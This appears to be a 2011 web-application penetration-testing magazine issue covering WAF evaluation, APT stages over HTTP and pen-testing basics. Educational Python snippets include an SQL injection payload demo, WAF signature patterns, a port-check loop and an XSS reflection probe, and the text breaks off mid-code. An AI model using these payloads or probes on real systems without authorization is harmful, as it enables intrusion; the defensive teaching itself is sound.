Since, by its very nature, a WAF stands on the frontline, certain test criteria should be applied to it as well. These include in particular identity and access management. In this context, the principle of least privilege applies: users are only awarded privileges on a need-to-have basis for their work or their use of the web application, and all other privileges are blocked. General integration of the WAF into Active Directory, eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions can be grasped intuitively and are clearly displayed, easy to understand and easy to set, then this in practice makes the greatest contribution to system security. A further plus is a user interface which is identical across several of the manufacturer's products, or, even better, a management center which administrators can use to manage numerous other network and security products alongside the WAF. The administrators can then rely on familiar settings processes for security clusters. This ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of security deployment across applications and sites.
In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data when the web application has weaknesses the WAF cannot level out. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI
Oliver Wai leads product marketing for Barracuda's line of Web application security and application delivery products. In his role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (Cum Laude) in Computer Engineering from Santa Clara University.
In the upcoming issue:

• Web Session Management
• Password management in code
• ETHical Ghosts on SF1
• Preservation, namely in the online gambling industry
• Cyber Security War

Available to download on December 22nd

If you would like to contact the PenTest team, just send an email to en@pentestmag.com. We will reply as soon as possible.
Page 4 http://pentestmag.com 01/2011 (1) November
ADVANCED PERSISTENT THREATS
The Significance of HTTP and the Web for Advanced Persistent Threats
by Matthieu Estrade
The means used to achieve an APT are often substantial and proportional to the criticality of the targeted data, notes Matthieu Estrade. The author claims that APTs are not just temporary attacks but real and constant threats with latent effect that need to be fought in the long run. The security of an application infrastructure begins with the conception process and requires basic rules to be respected to simplify security operations. Real-life experience of application management highlights the difficulties in implementing all the good practices. How important APTs are, you can find out by reading the article.
WEB APP SECURITY
Web Application Security and Penetration Testing
by Bryan Soliman
The author shows the importance of penetration testing in web application security. Penetration testing includes all of the processes in a vulnerability assessment, plus the exploitation of the vulnerabilities found in the discovery phase. Automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications.
Developers are from Venus, Application Security guys from Mars
by Paolo Perego
We know that Application Security people talk a different language than developers do, whenever we publish a report, make an assessment or review a software architecture from a security point of view. There is a gap between developers and the Application Security group. The two teams must interact with each other to reach the same goal of building secure code. Paolo Perego shows in his article how difficult the communication between these two groups is.
WEB APP VULNERABILITIES
Pulling the Legs of Arachni
by Herman Stevens
Herman Stevens gives us an in-depth analysis of Arachni. Arachni is a fire-and-forget (or point-and-shoot) web application vulnerability scanner developed
EDITOR'S NOTE
Web Application Security and Vulnerabilities
Have you ever wondered how important the security of web applications is for IT security?
The brand new November issue of the Web App Pentesting magazine will attempt to provide you with some answers. This issue features information about web application security and vulnerabilities. For the first time we would like to present the penetration testing topic from the web application's point of view. We publish articles about how important pentesting is in web application security, gathered from different sources to give you a deep insight into this matter.
In the November issue you will find a very good article on the significance of the HTTP protocol and the Web for Advanced Persistent Threats, written by Matthieu Estrade. He shows us the importance of APT attacks. The article is an exhaustive mini-guide to APTs and to how particular threats can be defined as APTs. Go to page 6 to find out more.
Go to pages 12-21 to read the articles about web application security. The first article, written by Bryan Soliman, covers Web Application Security and Penetration Testing. He introduces you to the nature of pen testing for web applications. I think most of you will find it a very useful and informative overview. Just read page 12.
Web Application Vulnerabilities: two great articles cover important aspects of this matter. I would like to introduce Herman Stevens' article Pulling the Legs of Arachni, an analysis of the Arachni web application vulnerability scanner. More on page 22. The second article worth reading is XSS & BeEF Metasploit Exploitation, written by Arvind Doraiswamy. The author describes Cross-Site Scripting in all its practical aspects on page 30.
All the articles are very interesting and deserve to be marked as must-reads. As always, we thank the beta testers and proofreaders for their excellent work and dedication to making this magazine even better. Special thanks to all the authors who helped me create this issue.
I would like to mention some supporters this time and thank Jeff Weaver, Daniel Wood and Edward Wierzyn for their help and great ideas. They work really hard to get the magazine out for you to read. I would also like to thank all the other helpers for their contributions to the magazine.
Last but not least, I would like to welcome Ryk Edelstain to our Advisory Board. Ryk has over 30 years of experience in IT security. As he describes himself: "I have a profound understanding of technology and the practices behind penetration testing. Although I work with other technical resources to handle the technical aspect of IT threat assessment, my training is in TSCM (Technical Surveillance CounterMeasures) for the detection and neutralization of both analogue and digital surveillance technologies. In fact, the practices and processes I have learned in TSCM parallel those of PT, where the environment is assessed, a strategy and process is defined, and a documented and methodical process is executed. Results are continually evaluated at each step, and as the environment is learned the process is refined and executed until the assessment is complete." Ryk will help us make PenTest even more worth reading.
Enjoy reading the new Web App Pentesting!
Katarzyna Zwierowicz & the PenTest team
Page 4 httppentestmagcom012011 (1) November Page 5 httppentestmagcom012011 (1) November
TEAM
Editor: Katarzyna Zwierowicz katarzyna.zwierowicz@software.com.pl
Betatesters: Jeff Weaver, Daniel Wood, Edward Wierzyn, Davide Quarta
Senior Consultant/Publisher: Paweł Marciniak
CEO: Ewa Dudzic ewa.dudzic@software.com.pl
Art Director: Ireneusz Pogroszewski ireneusz.pogroszewski@software.com.pl
DTP: Ireneusz Pogroszewski
Production Director: Andrzej Kuca andrzej.kuca@software.com.pl
Marketing Director: Ewa Dudzic ewa.dudzic@software.com.pl
Publisher: Software Press Sp. z o.o. SK, 02-682 Warszawa, ul. Bokserska 1
Phone: 1 917 338 3631
www.pentestmag.com
Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage. All trademarks presented in the magazine were used only for informative purposes. All rights to the trademarks presented in the magazine are reserved by the companies which own them. To create graphs and diagrams we used a program by
Mathematical formulas were created by Design Science MathType™.
DISCLAIMER: The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.
in Ruby by Tasos "Zapotek" Laskos. Step by step, the author acquaints us with the process of installing and using the program, and also clearly shows us the advantages and disadvantages of Arachni.
XSS & BeEF Metasploit Exploitation
by Arvind Doraiswamy
Cross-Site Scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code in the victim's browser. The impact of an XSS attack is limited only by the potency of the attacker's JavaScript code. In this article Arvind Doraiswamy shows us how an attacker can gain complete control over a user's browser, ultimately taking over the user's machine, by using BeEF.
Cross-site Request Forgery: In-depth Analysis
by Samvel Gevorgyan
Cross-Site Request Forgery (CSRF for short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the currently active session of an authorized user. Samvel Gevorgyan describes step by step how to proceed with a CSRF vulnerability.
WEB APPS CHECKING
First the Security Gate, then the Airplane
by Oliver Wai
Oliver Wai tries to answer the question: What needs to be heeded when checking web applications? Any web application, old or new, needs to be secured by a Web Application Firewall (WAF) in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
ADVANCED PERSISTENT THREATS
The omnipresence of the Web is now a given, and it serves a wide variety of situations, as detailed in the non-exhaustive list below:
• Community applications
• Institutional Web sites
• Online transactions
• Business applications
• Intranet/Extranet
• Entertainment
• Medical data
• Etc.
In response to user requirements and developing needs, content driven by HTTP has become increasingly rich and dynamic. It even goes as far as incorporating script languages that transform the Web browser into a universal enhanced client that embraces different platforms: PC, Mac and Mobile users all form part of the connected masses operating on their chosen platforms. But have these new privileges arrived without any underlying constraints?
The race towards sophistication has not been accompanied by similar developments in respect of the security and reliability of data circulated across the Web. A concrete example is the fact that HTTP does not provide native support for sessions, and it is therefore difficult to be sure that requests received during browsing emanate from the same user. Large-scale use of the Web illustrates the discrepancy that exists in terms of security versus volume, and this inherent flaw has become a major IT system issue, making HTTP a preferred vector of attacks and data compromise.
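HTTP's lack of native sessions is usually papered over with a session cookie. The sketch below illustrates that workaround in a few lines; the in-memory store and function names are illustrative, not any particular framework's API.

```python
import secrets

# Hypothetical in-memory session store -- a sketch of the cookie-based
# workaround, since HTTP itself carries no session state.
sessions = {}

def login(username):
    # Issue an unguessable token; the server must map it back to the user.
    token = secrets.token_hex(16)
    sessions[token] = username
    return token  # sent to the browser, e.g. in a Set-Cookie header

def identify(cookie_token):
    # Without a valid token, consecutive requests are indistinguishable.
    return sessions.get(cookie_token)

t = login("alice")
assert identify(t) == "alice"
assert identify("forged-token") is None
```

If the token is guessable or leaks, an attacker inherits the session, which is exactly why session management is a recurring attack surface.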
Cybercriminals are aware of the exploitability of the Web and have made it their number one target. Not a week goes by without an organization being compromised via HTTP:
• PlayStation Network (Sony) → WordPress version problem
• MySQL (Oracle) → SQL injection
• RSA (EMC) → SQL injection
• TJX → SQL injection
The above attacks, conceived and carried out with precise attention to logistics, are by no means an innovation, but we now refer to them differently, using the term APT: Advanced Persistent Threat.
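Several of the breaches listed above came down to SQL injection. A minimal sketch of the flaw and its standard fix, using an in-memory SQLite table with made-up names:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

# Vulnerable: attacker-controlled input is concatenated into the SQL text,
# so the payload's OR clause becomes part of the query logic.
payload = "x' OR '1'='1"
rows = conn.execute(
    "SELECT * FROM users WHERE name = '" + payload + "'").fetchall()
print(len(rows))  # the injected condition matches every row

# Safer: a parameterized query treats the payload as plain data, not SQL.
rows = conn.execute(
    "SELECT * FROM users WHERE name = ?", (payload,)).fetchall()
print(len(rows))
```

The same placeholder discipline applies in any language and database driver; string concatenation into SQL is the root cause in each of the incidents above that involved injection.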
Bolstered cyber-activity, the discovery of intrusions and updated legislation entailing mandatory declaration of incidents collectively lead to extensive media coverage, which in turn amplifies the impact on the image of the unfortunate victims, more often than not high-profile businesses or international organizations.
The Significance of HTTP and the Web for Advanced Persistent Threats
Initially created in 1989 by Tim Berners-Lee at CERN, the Hypertext Transfer Protocol (HTTP) was actually launched one year later and continues to use specifications that date to 1999 – a mere time lapse of twenty-two years in the transmission of Web-based content.
Anatomy of an APT
Advanced Persistent Threats are attacks calculated for latent effect and vested with a specific purpose: that of retrieving sensitive or critical data. Several steps are necessary to reach the goal:

• The initial intrusion
• Continued presence within the IT system
• Bounce mechanisms and in-depth infiltration
• Data extraction

HTTP plays an important role during the attacks, firstly because it is predominantly present during the various stages, and furthermore because it is often the only available protocol that can serve as an attack vector.

The Initial Intrusion
The system is invaded by an attack focused on an area exposed to the public on the Internet. In the case of the Sony PlayStation Network, for instance, the intrusion took place via their blog, which used a vulnerable version of WordPress. These days it is unusual for any organization to do without a website, and the latter can range from basic and simple to complex and dynamic. The website plays the role of a gateway that provides the initial point of entry into an infrastructure. It becomes an outpost that enables important information to be gathered in order to successfully carry out the rest of the attack. In addition, depending on the application infrastructure, location and lack of compartmentalization, it is possible for a simple, scarcely-used application to be found near or on the same server as a business application. The attack will bounce from the one to the other, and the business application will then become accessible and provide more access privileges.

Retrieval of information is often the vital issue during the bounce mechanism and extended infiltration into the system. Some examples of the data targeted:

• User passwords
• Hardware and network destinations → discovery
• Connectors to other systems → new protocols
• Etc.

Continued Presence
After the initial inroads into the structure, the next phase requires that presence within the system remains secure. The machine has to be re-accessed and exploited without arousing the suspicions of system administrators. The use of HTTP may be required because the different areas are often filtered, leaving only the necessary protocols open; HTTP is often left open to allow administrators to navigate through these machines or to update them. To remain as stealthy as possible, a strategic backdoor to the web application or the application server will use HTTP as a direct connection and/or as a tunnel to other applications. During this movement it will not be filtered, and no attention will be drawn to a process that opens a port unknown to the system.

Bounce Mechanisms
Whenever changes occur within an IT system, the steps involving initial intrusion and continued presence are repeated as many times as necessary until the goal is attained and sensitive data becomes accessible. HTTP once again comes into play during these stages because it is predominantly active and open between the different areas:

• Dialogue between server applications
• Web services
• Web administration interfaces
• Etc.

It often happens that security policies contain the same weaknesses from one area to another:

• Exit ports opened
• Filtering omissions on higher-level ports
• Use of the same default passwords

Data Extraction
Once the crucial information is reached, it is necessary to quit the system as discreetly as possible, over a certain length of time. The HTTP protocol is often enabled for exit without being monitored, for several reasons:

• Machines are often updated using HTTP
• When an administrator logs on to a remote machine, he will often require access to a website
• Since these areas are often regarded as "safe" zones, restrictions are lower and controls less strict

What Protective Measures Can Be Deployed?
Application security has become a major issue in the business world. Whereas network security is fairly conventional and primarily leans on the filtering of destinations, sources, IPs and ports, in most cases application security is more complex and involves applications that are often unique, bespoke and
deployed with many more specifications relating to infrastructure. Three steps are necessary to prevent or respond properly to an APT:
• Prevention
• Response
• Forensics
Prevention
Ideally, security should be addressed at the very beginning, when the software and even the application infrastructure are still at the conception stage. It is necessary to follow certain rules which will condition the response to different threats.
Define a Secure Application Infrastructure
Partition the Network
This measure is one of the pillars of the PCI-DSS, and for good reason. Keeping sections separate can limit the impact of an intrusion, making it more difficult for the attacker to obtain satisfaction because of the large number of bounces required to attain sensitive data. Each zone also deploys a security policy adapted to its content, whether the flow is inbound or outbound.
Moreover, partitioning allows for easier forensic analysis in case of a compromise. It is easier to understand the steps and measure the impact and the depth of the attack when one is able to analyze each area separately. Unfortunately, there are many systems described as flat infrastructures that contain a variety of applications housed in the same area. After an incident has occurred, it is difficult to determine precisely which applications have been compromised and what data has been hijacked.
Separation of Applications
Applications can be separated using criteria such as data categorization or the level of risk attached to the application. Clustering provides numerous advantages:
• It promotes rationalization in the design of security policies, which are more or less complex depending on the type of data and the structure of the application to secure.
• It enhances understanding of an attack, and by doing so facilitates the search for evidence, which will then be based on the criticality of data and complexity of applications.
Anticipate Possible Outcomes
To better understand the scope of an attack, it is necessary to anticipate the options available to a hacker once an application has been compromised. Once this is done, it is necessary to anticipate the procedures required to analyze, verify and understand the attack. We should bear in mind that an area of the infrastructure in which it is impossible to install a monitoring tool will be very complex to analyze during an incident. In such a case it is necessary to predefine the tools and procedures for investigation and/or monitoring.
Risk Analysis and Attack Guidelines
This step allows a precise understanding of risks based on the data manipulated by applications. It has to be carried out by studying the web applications, their operation and their business logic. Once each data component has been identified, it is possible to draw up a list of rules and regulations that need to be followed by the application infrastructure.
Developer Training
Applications are commonly developed following specific business imperatives, often with the added stress of meeting availability deadlines. Developers do not place security high on their list of priorities, and it is often overlooked in the process. However, there are several ways to significantly reduce risk:
• Raising developer awareness of application attacks
  • OWASP Top 10
  • WASC TC v2
• The use of libraries to filter input
  • Libraries are available for all languages
• Setting up audit functions, logs and traceability
• Accurate analysis of how the application works
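The input-filtering libraries mentioned above boil down to two habits: validate input against a whitelist, and encode output for the context it lands in. A small sketch using only Python's standard library; the username policy and function names are invented examples, not any specific library's API.

```python
import html
import re

# Illustrative whitelist: usernames restricted to a safe character set.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{3,20}$")

def valid_username(value):
    # Reject anything outside the whitelist instead of trying to
    # enumerate every dangerous character (blacklisting is fragile).
    return bool(USERNAME_RE.match(value))

def render_comment(text):
    # html.escape neutralizes the characters XSS payloads rely on
    # before the text is embedded in an HTML page.
    return "<p>" + html.escape(text) + "</p>"

assert valid_username("alice_01")
assert not valid_username("alice<script>")
print(render_comment("<script>alert(1)</script>"))
```

Equivalent validation and encoding helpers exist for every mainstream language, which is the point of the bullet above: developers rarely need to write this logic from scratch.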
Regular Auditing: Code Analysis
You can resort to manual code analysis by an auditor, or to automated analysis using the tools available to find vulnerabilities in the source code of web applications. These tools often require complex configuration. This step is useful to detect vulnerabilities before going into production, and thus to fix them before they are exploited.
Unfortunately, this practice is only possible if you have access to the source code of the application. Closed-source software packages cannot be analyzed.
Scanning and Penetration Testing
All applications can be scanned and pentested. These tests also require configuration and/or a thorough analysis of the application to determine the credentials necessary
for navigation, or the resources to be avoided because of their capacity to cause significant damage (e.g. links enabling the deletion of entries in the database).
These tests have to be reproduced as often as possible, and whenever a change in the application is put in place by the developers.
Appropriate Response
Traditional firewalls do not filter network application protocols; at best, the so-called next-generation models can recognize a type of protocol and filter content in the manner of an IPS by recognizing attack patterns. This response is clearly inadequate.
Each zone containing web applications has to be filtered on incoming and outgoing content and on the use of the protocol itself. This type of deployment is often called deep defense, and it has the ability to monitor the various attacks at both the application and network levels. Last but not least, the association of the identity context with the security policy allows better detection of anomalies.
Traffic Filtering: The WAF (Web Application Firewall)
Web application firewalls can be considered an extension of network firewalls to the application layer. They are able to analyze HTTP and the content it conveys. The device is strongly recommended by section 6.6 of the PCI-DSS. Often used in reverse proxy mode, a WAF allows for a break in the protocol and facilitates the restructuring of areas between applications.
The WAFEC document (Web Application Firewall Evaluation Criteria) published by WASC is a useful guideline that helps to understand and evaluate the different vendors as needed. The WAF also helps to monitor and alert in case of a threat, in order to trigger a rapid response (e.g. blocking the IP of the attacker via a dialogue protocol with network firewalls).
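To make the filtering idea concrete, here is a deliberately toy sketch of pattern-based request inspection in the spirit of a WAF's negative-security model. The three patterns are only examples; real WAFs combine such signatures with input normalization, whitelisting and learning modes.

```python
import re

# Toy signature set -- illustrative, not a production rule base.
ATTACK_PATTERNS = [
    re.compile(r"(?i)<script"),                # reflected XSS attempt
    re.compile(r"(?i)\bunion\b.+\bselect\b"),  # SQL injection probe
    re.compile(r"\.\./"),                      # path traversal
]

def inspect(query_string):
    # Block the request as soon as any signature matches.
    for pattern in ATTACK_PATTERNS:
        if pattern.search(query_string):
            return "block"
    return "allow"

assert inspect("id=42") == "allow"
assert inspect("q=<script>alert(1)</script>") == "block"
assert inspect("id=1 UNION SELECT password FROM users") == "block"
```

Signature matching alone is easy to evade with encoding tricks, which is precisely why the WAFEC criteria mentioned above look at normalization and protocol validation as well.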
Traffic Filtering: The WSF (Web Services Firewall)
The WSF represents an extension of the WAF to the protocols carrying XML traffic over HTTP, such as SOAP or REST. XML and its standards make security management easier, in the sense that the operation of the service is described by documents generated directly by the development framework (e.g. WSDL, schemas).
Web services are vulnerable to the same attacks as web applications; they consequently need the same kind of protection. Their position in the application infrastructure, however, is much more critical: they are often located at the heart of sensitive information zones and connected directly via private links to partner infrastructures. The WSF provides security on the message format and content, but also on the use of a service. The use or production of a web service entails a contract between the two parties on the type of use (e.g. number of messages per day, data types, etc.). The WSF will also serve to monitor this function and to ensure respect of the SLA between the two parties.
Authentication / Authorization
Applications use identities to control access to various resources and functions. The association of the identity context and security increases efficiency in the detection of anomalies. For example, a whitelist adapted according to the type of user can verify access to information based on the user's role.
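The role-adapted whitelist idea can be sketched in a few lines; the role names and resource paths below are invented for illustration.

```python
# Hypothetical whitelist mapping each role to the resources it may reach.
ROLE_WHITELIST = {
    "customer": {"/account", "/orders"},
    "admin": {"/account", "/orders", "/admin/users"},
}

def authorized(role, path):
    # Anything outside the role's whitelist is denied and can be
    # flagged as an anomaly for the monitoring described below.
    return path in ROLE_WHITELIST.get(role, set())

assert authorized("customer", "/orders")
assert not authorized("customer", "/admin/users")
```

A request for `/admin/users` coming from a customer session is both denied and a useful detection signal: it marks a user probing beyond their identity context.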
Ensuring Continuity of Service
Application security is primarily related to the exploitation of vulnerabilities in order to divert normal use for malicious purposes. However, some attacks based on weaknesses can be devastating in effect, perpetrated to make the application unavailable and thereby provoke losses due to activity downtime. To retaliate, it is necessary to establish protective measures that block denial of service and automated processes, and to ensure load balancing and SSL acceleration.
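One common measure against automated processes and simple denial-of-service floods is rate limiting. A minimal fixed-window sketch; the window and limit values are arbitrary examples, and production systems usually prefer token buckets at the load balancer.

```python
import time
from collections import defaultdict

WINDOW = 1.0   # seconds per window (illustrative value)
LIMIT = 5      # requests allowed per window per client (illustrative)

hits = defaultdict(list)

def allow(client_ip, now=None):
    now = time.monotonic() if now is None else now
    # Keep only the timestamps that fall inside the current window.
    hits[client_ip] = [t for t in hits[client_ip] if now - t < WINDOW]
    if len(hits[client_ip]) >= LIMIT:
        return False  # over the limit: reject or challenge the client
    hits[client_ip].append(now)
    return True

results = [allow("10.0.0.1", now=100.0) for _ in range(7)]
print(results)  # first five pass, the rest are rejected
```

Keying on the client IP alone is a known weakness (shared proxies, spoofed sources), so real deployments combine several identifiers.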
Operation / Monitoring
It is important to understand the use of the application during production, to monitor and detect abnormal behavior, and to make decisions accordingly:
• Blacklisting
• Legal action
• Redirection to a honeypot
Log Correlation
Understanding abnormal behavior in an application helps in locating an attack. An application infrastructure can comprise hundreds of applications. To understand the attack as a whole and monitor its changes (discovery, aggression, compromise), it is necessary to have a holistic view.
To do this, it is imperative to correlate logs in order to obtain a real-time overall analysis and understand the threat mechanics:
• Mass attacks on a type of application
• Attacks targeting a specific application
• Attacks focused on a type of data
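The correlation idea can be illustrated with a toy example: the same source hitting several applications with one attack signature stands out only once events from the different logs are brought together. The event records below are invented; a real deployment would feed a SIEM, but the grouping logic is the same.

```python
from collections import Counter

# Hypothetical pre-parsed events gathered from several application logs.
events = [
    {"app": "shop", "src": "203.0.113.9", "sig": "sqli"},
    {"app": "blog", "src": "203.0.113.9", "sig": "sqli"},
    {"app": "intranet", "src": "203.0.113.9", "sig": "sqli"},
    {"app": "shop", "src": "198.51.100.4", "sig": "xss"},
]

# One source using one signature across many applications suggests a
# campaign rather than isolated noise.
by_source = Counter((e["src"], e["sig"]) for e in events)
campaigns = {key: n for key, n in by_source.items() if n >= 3}
print(campaigns)
```

No single application's log shows more than one event here; only the cross-application view reveals the pattern, which is the holistic view the text calls for.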
Reporting and Alerting
The dialogue between application, network and security teams is often complex within an organization. Formalized reports on attacks and on the use of the application provide these teams with a basis for work and an understanding of application threats. Alerts will enable them to react and trigger procedures, either at the network level by blocking the IP of the attacker, or at the application level by forbidding access to resources or areas, or more directly by referral to a honeypot in view of analyzing the behavior of the attacker.
Forensics
Understanding the Scope of an Attack
For each area compromised it is important to understand what elements have been impacted, and to trace the attack to the roots of the intrusion and compromise: the installation of a backdoor, bounce mechanisms to other areas and/or extraction of data.
Analysis of Application Components
To understand how the intrusion occurred, it is important to look for abnormal uses. One example could be the presence of anomalous data in a variable or a cookie. To drill down to this level, the logs of the various application components turn out to be very useful:
• Web or application server
• Database
• Directory
• Etc.
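As a small illustration of hunting for anomalous data in a cookie, the sketch below scans invented log lines for suspicious characters in a session cookie value. The log format, cookie name and patterns are assumptions for the example, not a standard.

```python
import re

# Invented web server log lines; the second carries an injection attempt
# inside the session cookie.
lines = [
    'GET /account cookie="session=ab12cd34"',
    'GET /account cookie="session=ab12cd34\' OR 1=1--"',
]

# Characters and sequences that should never appear in this cookie.
suspicious = re.compile(r"['\"<>]|--|\.\./")

flagged = []
for line in lines:
    m = re.search(r'cookie="session=([^"]*)"', line)
    if m and suspicious.search(m.group(1)):
        flagged.append(m.group(1))
print(flagged)
```

Running such checks over the web server, database and directory logs listed above is often how the first trace of the intrusion is found.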
Systems Analysis
To understand how the attacker remained in the area, it is important to identify the type of backdoor used. From the simplest act, such as placing an executable file in the application itself, to the injection of code into a process (e.g. hooking network functions), it is necessary to analyze the system hosting the application:
• Changed configuration files
• Users added
• Security rules changed
• Errors of execution or increases in privileges
• Unknown daemons or unusual groups and users
• Etc.
Analysis of Network Equipment
During the various bounces within the application infrastructure, the discovery and exploration of new possibilities leaves fingerprints. Network firewalls keep precious logs with traces of these attempts. In addition, if access is logged, it is important to check whether there are connections to web applications at unusual times.
The End Justifies the Means
In conclusion, we can see that the means used to achieve an APT are often substantial and proportional to the criticality of the targeted data. APTs are not just temporary attacks but real and constant threats with latent effect that need to be fought in the long run.
The security of an application infrastructure begins with the conception process and requires basic rules to be respected to simplify security operations.
Real-life experience of application management highlights the difficulties in implementing all the good practices.
A comprehensive study of threats, an appropriate response and the anticipation of possible incidents are now the recommended procedure in dealing with application attacks.
MATTHIEU ESTRADE
Matthieu Estrade has 14 years of experience in internet security. In 2001, Matthieu designed a pioneering application firewall based on Web reverse proxy technology for the company Axiliance. As a well-known specialist in his field, he soon became a member of the open source Apache HTTP server development team. His security expertise has been put to contribution in WASC (Web Application Security Consortium) projects like WAFEC and WASSEC. Matthieu is also a member of the French OWASP chapter. Matthieu is currently CTO at BeeWare.
WEB APP SECURITY
Dynamic web applications usually use technologies such as ASP, ASP.NET, PHP, Ajax, JSP, Perl, ColdFusion and Flash.
These applications expose financial data, customer information and other sensitive and confidential data that require authentication and authorization. Ensuring that web applications are secure is a critical mission that businesses have to go through to achieve the desired security level of such applications. With the accessibility of such critical data to the public domain, web application security testing also becomes a paramount process for all web applications that are exposed to the outside world.
Introduction
Penetration testing (also called pen testing) is usually conducted by ethical hackers, where the security team reviews application security vulnerabilities to discover potential security risks. Such a process requires deep knowledge and experience in a variety of different tools, and a range of exploits that can achieve the required tasks.
During pen testing, different web application vulnerabilities are tested (e.g. input validation, buffer overflow, cross-site scripting, URL manipulation, SQL injection, cookie modification, bypassing authentication and code execution). A typical pen test involves the following procedures:
• Identification of Ports – ports are scanned and the associated services running on them are identified.
• Software Services Analyzed – both automated and manual testing is conducted to discover weaknesses.
• Verification of Vulnerabilities – this process helps verify that the vulnerabilities are real, where a weakness might be exploited, to help remediate the issues.
• Remediation of Vulnerabilities – the vulnerabilities are resolved and then re-tested to ensure they have been addressed.
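The port-identification step above can be sketched with a plain TCP connect check. This is a toy sketch only; real engagements use dedicated tools such as Nmap, and scanning systems without written authorization is illegal in many jurisdictions.

```python
import socket

def port_open(host, port, timeout=0.5):
    # A completed TCP handshake means something is listening on the port;
    # service identification would then follow (banner grabbing, etc.).
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# Probe a few common service ports on the local machine only.
for port in (22, 80, 443):
    state = "open" if port_open("127.0.0.1", port) else "closed/filtered"
    print(f"{port}/tcp {state}")
```

A connect scan is noisy and easily logged, which from the defender's side is exactly the kind of fingerprint the forensics discussion in the previous article looks for.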
Part of the initiative of securing web applications is to include the security development lifecycle as part of the software development lifecycle, where the number of security-related design and coding defects can be reduced, as can the severity of any defects that remain undetected. Despite the fact that these initiatives solve some of the security problems, some undiscovered defects will remain even in the most scrutinized web applications. Until scanners can harness true artificial intelligence and put anomalies into context or make normative judgments about them, the struggle to find certain vulnerabilities will exist.
Web Application Security and Penetration Testing
In recent years, web applications have grown dramatically within many organizations and businesses, where such entities have become very dependent on this technology as part of their business lifecycle.
Automated Scanning vs. Manual Penetration Testing
A vulnerability assessment simply identifies and reports vulnerabilities, whereas a pen test attempts to exploit vulnerabilities to determine whether unauthorized access or other malicious activity is possible. By performing a pen test to simulate an attack, it is possible to evaluate whether an application has any potential vulnerabilities resulting from poor or improper system configuration, hardware or software flaws, or weaknesses in the perimeter defences protecting the application.
With more than 75% of attacks occurring over the HTTP/S protocols, and more than 90% of web applications containing some type of security vulnerability, it is essential that organizations implement strong measures to secure their web applications. Most of these attacks occur at the front door of the organization, where the entire online community has access to these doors (i.e. port 80 and port 443). With the complexity and the tremendous amount of sensitive data that exist within web applications, consumers not only expect but also demand security for this information.
That said, securing a web application goes far beyond testing the application using automated systems and tools or manual processes. The security implementation begins in the conceptual phase, where the security risk introduced by the application is modeled and the countermeasures that are required are identified. It is imperative that web application security be thought of as another quality vector of every application, one that has to be considered through every step of the application lifecycle.
Discovering web application vulnerabilities can be performed through different processes:
• Automated process – where scanning tools or static analysis tools are used
• Manual process – where penetration testing or code review is used
Web application vulnerability types can be grouped into two categories
WEB APP SECURITY
Page 14, http://pentestmag.com, 01/2011 (1) November

Technical Vulnerabilities
Such vulnerabilities can be examined through the following tests: Cross-Site Scripting, Injection Flaws, and Buffer Overflow. Automated systems and tools which analyze and test web applications are much better equipped to test for technical vulnerabilities than manual penetration tests. While automated testing and scanning tools may not be able to address 100% of all technical vulnerabilities, there is no reason to believe that such tools will achieve that goal in the near future. Current problems facing web application scanning tools include the following: client-side generated URLs, required JavaScript functions, application logout, transaction-based systems requiring specific user paths, automated form submission, one-time passwords, and infinite web sites with random URL-based session IDs.
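The core of an automated check for one of these technical vulnerabilities, reflected cross-site scripting, can be sketched in a few lines: inject a unique marker into each parameter and see whether it comes back unescaped. A minimal sketch; the fetch callables below simulate a target so the probe logic stays self-contained, and all names are illustrative.

```python
import html

MARKER = "<xsstest123>"

def probe_reflected_xss(params, fetch):
    """Return the names of parameters whose value is reflected unescaped."""
    vulnerable = []
    for name in params:
        tainted = dict(params, **{name: MARKER})
        body = fetch(tainted)
        if MARKER in body:            # reflected verbatim -> suspicious
            vulnerable.append(name)
    return vulnerable

# Simulated responses standing in for a live target:
def escaping_app(params):             # encodes output correctly
    return "".join(html.escape(v) for v in params.values())

def vulnerable_app(params):           # echoes input back verbatim
    return "".join(params.values())

print(probe_reflected_xss({"q": "hello"}, escaping_app))    # []
print(probe_reflected_xss({"q": "hello"}, vulnerable_app))  # ['q']
```

A real scanner would drive `fetch` with an HTTP client and repeat this over every discovered form and query parameter.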
Logical Vulnerabilities
Such vulnerabilities allow manipulating the logic of the application to perform tasks that were never intended. While both an automated scanning tool and a skilled penetration tester can navigate through a web application, only the latter is able to understand the logic behind a specific workflow or how the application works in general. Understanding the logic and the flow of an application allows the manual pen tester to subvert the business logic and expose security vulnerabilities. For instance, an application might direct the user from point A to point B to point C based on the logic flow implemented within the application, where point B represents a security validation check. A manual review of the application might show that it is possible for attackers to go directly from point A to point C, bypassing the security validation that exists at point B.
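The A-to-C bypass described above typically comes down to the server checking *which* step was requested rather than *whether the previous step completed*. A minimal sketch of such a flaw; the workflow and method names are fabricated for illustration.

```python
class CheckoutFlow:
    """Toy three-step workflow: A (review) -> B (validation) -> C (commit)."""

    def __init__(self):
        self.completed = set()

    def step_a(self):
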